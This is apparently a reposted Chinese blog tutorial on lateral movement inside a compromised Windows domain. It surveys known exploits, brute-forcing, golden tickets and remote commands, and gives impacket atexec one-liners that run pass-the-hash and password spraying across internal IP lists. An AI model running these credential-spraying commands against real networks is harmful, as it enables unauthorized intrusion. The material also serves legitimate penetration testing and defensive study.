横向移动的思路与实现

前言

当拿到某域内的一台机器后,需要进一步的扩大战果,这时候就需要进行横向移动,横向移动这部分的技术的都是基于信息收集的结果才能实现,信息收集很重要,切记。

推荐几种实现方式:

  1. 利用现有exp来对操作系统进行攻击,例如ms17010,ms08067等。
  2. 利用密码爆破ssh或者对smb服务进行爆破,可利用impacket工具实现。
  3. 利用服务端应用的rce漏洞,如tomcat等中间件漏洞。
  4. 制作黄金票据进行横向移动,可利用impacket与mimikatz工具实现。
  5. 利用windows的自带命令远控对方主机。
  6. 对敏感端口进行攻击。

实现

利用exp来对操作系统进行攻击

这部分主要靠积累,根据对方的操作系统在网上下载对应的exp进行攻击,当然能写exp也行。

利用密码爆破

倘若要攻击linux主机的话,ssh爆破是个好方法,这个可以自己写python脚本实现比较简单。
倘若是攻击windows主机也可以采用密码爆破,具体实现方法是利用impacket工具实现:

内网机器遍历做hash传递验证,ips.txt内容为内网ip,每段一条 FOR /F %i in (ips.txt) do
atexec.exe -hashes :3dbde697d71690a769204beb12283678
./administrator@%i whoami
在这里插入图片描述

指定主机ntlm hash遍历验证,hashes.txt为已知ntlm hash内容,每段一条 FOR /F %i in
(hashes.txt) do atexec.exe -hashes %i ./[email protected]
whoami
在这里插入图片描述
文件内部的hash格式应该为":nthash"或者"lmhash:nthash",如果只采用nthash切记加一个冒号":"
在这里插入图片描述

内网机器遍历做密码验证,passwords.txt为已知密码内容,每段一条 FOR /F %i in (passwords.txt) do
atexec.exe ./administrator:%[email protected] whoami
在这里插入图片描述

指定主机密码遍历验证,ips.txt内容为内网ip,每段一条 FOR /F %i in (ips.txt) do atexec.exe
./administrator:123@%i whoami

在这里插入图片描述
更详细的信息请看我的这篇impacket命令总结

利用服务端应用的漏洞

这部分例子很多后面会陆陆续续出文章来讲解。

黄金票据

黄金票据相关技术请看我的这篇文章:

黄金票据的制作与使用
mimikatz常用命令总结
impacket命令总结

利用windows的自带命令远控对方主机

下面两篇文章对其进行了比较详细的讲述:

windows远程命令执行
windows常见快捷命令

对敏感端口进行攻击

可以先看看我的这篇敏感端口的常见攻击方式,后续会写具体文章来讲对应的知识点。

附录:后渗透信息收集

我的这两篇文章对其做了总结:

windows信息收集与内网定位
linux后渗透信息收集

猜你喜欢

转载自blog.csdn.net/qq_41874930/article/details/108274266